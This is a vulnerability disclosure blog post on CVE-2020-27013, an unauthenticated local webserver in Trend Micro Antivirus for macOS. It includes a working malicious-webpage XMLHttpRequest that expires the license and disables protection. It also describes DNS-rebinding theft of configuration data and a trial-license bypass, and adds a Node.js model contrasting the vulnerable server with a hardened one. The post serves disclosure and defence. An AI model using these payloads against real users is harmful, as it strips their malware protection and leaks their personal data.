2020-10-29 09:30 | Cees Elzinga

CVE-2020-27013: Trend Micro Antivirus for macOS - Part 1

In this 3-part blog post we will take a deep-dive into Trend Micro Antivirus for macOS. In our normal blogs we often detail a single security issue. This time we will dig deeper and look at multiple attack vectors against a single product:

Part 1: Attacks from the browser

Trend Micro Antivirus offers online security and antivirus protection for macOS devices.

Trend Micro main interface

In this post we will look at attacks from the browser. We will try to attack a client that has Trend Micro Antivirus installed and visits our malicious website. We had two specific attacks in mind:

  • Try to bypass Trend Micro's protections
  • Try to exploit an issue in Trend Micro itself

We did not find any exploitable bugs in Trend Micro's own code, but we did find several other attacks.

Local webserver

Trend Micro installs a local webserver that listens on 127.0.0.1:37848. It uses this as a form of inter-process communication. The webserver is used, for example, to check the expiration status of the license:

% curl 'localhost:37848/GetProperty?Expiration'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Expiration</key>
    <string>610581599.000000</string>
</dict>
</plist>

The webserver is implemented by the iTISPlugin, which is loaded into the iCoreService process. That process runs as root:

% sudo lsof | grep 37848
COMMAND    PID USER   FD      TYPE  NAME
iCoreServ 2890 root   11u     IPv4  localhost:37848 (LISTEN)

The example curl 'localhost:37848/GetProperty?Expiration' reads the Expiration property. Reversing shows that the backing data is stored in a plist file: /Library/Application Support/TrendMicro/Plug-in/iTISPlugin.framework/Versions/A/Resources/TMPlugin.plist. The contents of this file are partially encrypted; both the key names and the values appear as hex strings:

% cat TMPlugin.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>00D62AD3522F12420D3A269CE3752750</key>
    <string>2150C0B98A8767711DB1FD28470E633C678B5C494924DA53A5AAB9B2BF3DB2279E987B34033F69C52D5CE4DCB2376D85</string>
    <key>0B6695E9434D90DF02C936E3101FD1FA</key>
    ... more data

Vulnerability

The vulnerability is that callers can not only read these properties but also write them. And since the webserver requires no authentication, any (malicious) website the user visits can modify these settings as well. Some of the (decrypted) property names sound interesting:

__EnableWebThreatProtection__
__EnableScheduledScan__
lastOneDayLaunchDate
LastAUTime
LicenseStatus
__EnableRealTimeScan__
... many more

At first sight this looks like a trivial bypass of Trend Micro: a malicious website disables __EnableWebThreatProtection__ and then launches the real attack. The developers appear to have anticipated this, however, and protected some of the properties: all settings whose names start with underscores (e.g. __EnableRealTimeScan__) are refused on write. This blacklist covers only a small number of properties, and a malicious website can still modify all the remaining ones. Three example attacks are listed below.

Attack 1: Disabling Trend Micro Antivirus

Attack 1 mimics a website that wants to do something malicious, for example install malware, but whose malware would be detected by Trend Micro. Using the insecure webserver, the website first disables the AV and with it all the protection it provided. It can then continue to install the malware undetected.

As discussed before some of the properties, such as __EnableRealTimeScan__ are protected from modification. The exploit therefore uses another trick: it sets the license to an expired state.

The following screenshots show a full exploit flow:

  • Start situation: machine is protected from malware (EICAR test virus)
Trend Micro EICAR
  • Exploitation: The user visits a malicious website. The website does an AJAX call to the API that expires the Trend Micro license. (Note: the browser does send the request, but the malicious website cannot read the response: the page's origin differs from 127.0.0.1:37848 and the server returns no CORS headers, so the same-origin policy blocks access to the result. Attack 2 will bypass that. For Attack 1 it doesn't matter, because sending the request is enough.)

Source code of the malicious website:

<html><head><script>
var request = new XMLHttpRequest();
request.open("GET", "http://127.0.0.1:37848/SetProperty?LicenseStatus=2");
request.send();
</script></head><body><h1>Malicious website</h1></body></html>
  • Exploitation: The website installs its malware. Trend Micro no longer protects the machine
Trend Micro disabled

Attack 2: Malicious websites can steal configuration info (SN, Email, etc)

As shown above, malicious websites can set properties. But they won't be able to read the responses: the API lives on the origin http://127.0.0.1:37848, the malicious page is served from a different origin, and the webserver sends no Cross-Origin Resource Sharing (CORS) headers, so the browser's same-origin policy withholds the response body from the page's script.

An attacker can bypass this with DNS rebinding. The attacker serves the malicious page from a hostname they control, on port 37848, with a very short DNS TTL. Once the page has loaded, the hostname is re-pointed at 127.0.0.1. Subsequent requests from the page to the same hostname and port now reach the Trend Micro webserver, and because the hostname and port are unchanged the browser treats them as same-origin and hands the response to the script. This works because the webserver answers regardless of the Host header it receives; a local service that only accepts requests whose Host header names the loopback listener defeats the technique. With the responses readable, an attacker can steal configuration information such as the serial number, email address, etc.

Attack 3: Keygen / license verification bypass

Another attack is to change the settings of the trial license. By updating the expiration time, any user can extend their trial license into a free full version, resulting in lost revenue for Trend Micro.

Trend Micro keygen
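The following is an added example in Node.js; it is not code from the original post or from Trend Micro. It models the GetProperty/SetProperty interface from the "Local webserver" section together with the underscore blacklist from the "Vulnerability" section, replays attack 1 and the DNS-rebound read of attack 2 against that model, and places a hardened variant beside it that shows the checks closing each path: Host restricted to the loopback listener, a browser Origin header refused, a shared secret required on every call, and POST required for writes. It also converts the Expiration value used in attack 3: that value reads as a Core Foundation absolute time (seconds since 2001-01-01 00:00:00 UTC), which places the 610581599 shown earlier at 7 May 2020, 23:59:59 Copenhagen time, i.e. the end of a trial day. The conversion helper assumes that interpretation. The request object shape, the X-Auth-Token header, the token value and all function names are this example's own assumptions.

```javascript
// Added example in Node.js; not Trend Micro's code. A minimal model of the
// GetProperty/SetProperty webserver described in this post, next to a hardened
// variant. The request shape {method, url, headers}, the X-Auth-Token header and
// all function names are this example's own assumptions.

// Core Foundation absolute time: seconds since 2001-01-01 00:00:00 UTC. The
// Expiration property is assumed to use this format.
const CF_EPOCH_UNIX = 978307200;
const appleTimeToDate = (s) => new Date((Number(s) + CF_EPOCH_UNIX) * 1000);
const dateToAppleTime = (d) => (Math.floor(d.getTime() / 1000) - CF_EPOCH_UNIX).toFixed(6);

// Serialise one property in the plist shape GetProperty returns.
function toPlist(name, value) {
  return ['<?xml version="1.0" encoding="UTF-8"?>',
    '<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">',
    '<plist version="1.0">', '<dict>',
    `    <key>${name}</key>`, `    <string>${value}</string>`,
    '</dict>', '</plist>'].join('\n');
}

// Parse a flat <dict> of <key>/<string> pairs (what an attacker does with the
// response once DNS rebinding makes it readable). Not a general plist parser.
function parsePlist(xml) {
  const out = {};
  const re = /<key>([^<]*)<\/key>\s*<string>([^<]*)<\/string>/g;
  for (let m; (m = re.exec(xml)) !== null;) out[m[1]] = m[2];
  return out;
}

// Per the post, only names starting with underscores are protected from writes.
const isProtected = (name) => name.startsWith('__');

// Vulnerable model: any GET from any origin can read or write a property.
function makeVulnerableServer(initial) {
  const store = { ...initial };
  function handle(req) {
    const u = new URL(req.url, 'http://127.0.0.1:37848');
    const [name, value] = [...u.searchParams][0] || [];   // ?Name or ?Name=value
    if (!name) return { status: 400, body: 'missing property' };
    if (u.pathname === '/GetProperty') {
      return name in store ? { status: 200, body: toPlist(name, store[name]) }
                           : { status: 404, body: 'unknown property' };
    }
    if (u.pathname === '/SetProperty') {
      if (isProtected(name)) return { status: 403, body: 'protected property' };
      store[name] = value;
      return { status: 200, body: 'ok' };
    }
    return { status: 404, body: 'not found' };
  }
  return { store, handle };
}

// Hardened model. Each check closes one path used in the attacks above:
//  - Host must name the loopback listener itself; a DNS-rebound request arrives
//    with Host: attacker.example:37848 and is refused.
//  - A request carrying an Origin header comes from a browser page, not from a
//    local IPC client, and is refused.
//  - Every request needs a secret the web page cannot know (assumed to be handed
//    to local clients out of band), and writes must be POST, so a plain
//    cross-site GET can never change state.
function makeHardenedServer(initial, token) {
  const inner = makeVulnerableServer(initial);
  const LOOPBACK = ['127.0.0.1:37848', 'localhost:37848', '[::1]:37848'];
  function handle(req) {
    const h = Object.fromEntries(
      Object.entries(req.headers || {}).map(([k, v]) => [k.toLowerCase(), v]));
    if (!LOOPBACK.includes(h.host)) return { status: 400, body: 'bad host' };
    if ('origin' in h) return { status: 403, body: 'browser origin refused' };
    if (h['x-auth-token'] !== token) return { status: 401, body: 'unauthorised' };
    const u = new URL(req.url, 'http://127.0.0.1:37848');
    if (u.pathname === '/SetProperty' && req.method !== 'POST') {
      return { status: 405, body: 'POST required' };
    }
    return inner.handle(req);
  }
  return { store: inner.store, handle };
}

// Replay attack 1 (the XMLHttpRequest shown above) and a DNS-rebound read against
// both models, plus one legitimate local write against the hardened one.
function demo() {
  const initial = { LicenseStatus: '1', Expiration: '610581599.000000', __EnableRealTimeScan__: '1' };
  const local = { host: '127.0.0.1:37848' };
  const attack = { method: 'GET', url: '/SetProperty?LicenseStatus=2', headers: { ...local, origin: 'http://attacker.example' } };
  const rebound = { method: 'GET', url: '/GetProperty?Expiration', headers: { host: 'attacker.example:37848' } };
  const vuln = makeVulnerableServer(initial);
  const hard = makeHardenedServer(initial, 'example-token');
  return {
    vulnerableStatus: vuln.handle(attack).status,           // 200: license now expired
    vulnerableLicense: vuln.store.LicenseStatus,            // '2'
    protectedStatus: vuln.handle({ ...attack, url: '/SetProperty?__EnableRealTimeScan__=0' }).status, // 403
    reboundRead: parsePlist(vuln.handle(rebound).body).Expiration, // '610581599.000000' leaked
    hardenedStatus: hard.handle(attack).status,             // 403
    hardenedRebound: hard.handle(rebound).status,           // 400
    localWrite: hard.handle({ method: 'POST', url: '/SetProperty?LicenseStatus=3',
                              headers: { ...local, 'x-auth-token': 'example-token' } }).status, // 200
    hardenedLicense: hard.store.LicenseStatus,              // '3'
    expiresAt: appleTimeToDate(initial.Expiration).toISOString(), // 2020-05-07T21:59:59.000Z
  };
}
```

Run with `node` and call demo(); the vulnerable model accepts the cross-site write and leaks the rebound read, while the hardened model refuses both yet still serves the authenticated local client. The Host check alone is what stops DNS rebinding; the token is what stops a blind cross-site GET like the one in attack 1, which the browser sends even though the page can never read the reply.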

Fixes

This issue was reported to the Zero Day Initiative and is tracked under ZDI-20-1243. It was assigned CVE-2020-27013 and was patched on 2020-10-14. Additional details are available in Trend Micro's advisory TMKA-09950.

Conclusion

In part 1 of this series we have shown how a malicious website can disable Trend Micro Antivirus before attempting to install malware.

In the next part we will show how a local user can abuse Trend Micro Antivirus to get code execution as root.



© 2020 Danish Cyber Defence A/S · Vester Farimagsgade 41 · 1606 København V · CVR 38871064